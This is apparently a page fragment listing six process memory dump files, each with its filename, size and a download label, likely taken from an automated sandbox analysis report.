                                                                                                                                                                                                                                                                                                                                                                              • memory/7464-4013-0x0000000006190000-0x00000000061A4000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                              • memory/7464-3437-0x0000000000400000-0x0000000000490000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                576KB

                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                              • memory/7464-4002-0x0000000005E70000-0x0000000005E7C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                48KB

                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                              • memory/7464-4003-0x0000000005E80000-0x0000000005E94000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                              • memory/7572-2498-0x0000000000D90000-0x0000000000DA6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                88KB

                                                                                                                                                                                                                                                                                                                                                                                Download

                                                                                                                                                                                                                                                                                                                                                                              • memory/7572-2507-0x0000000005820000-0x0000000005876000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                344KB

                                                                                                                                                                                                                                                                                                                                                                                Download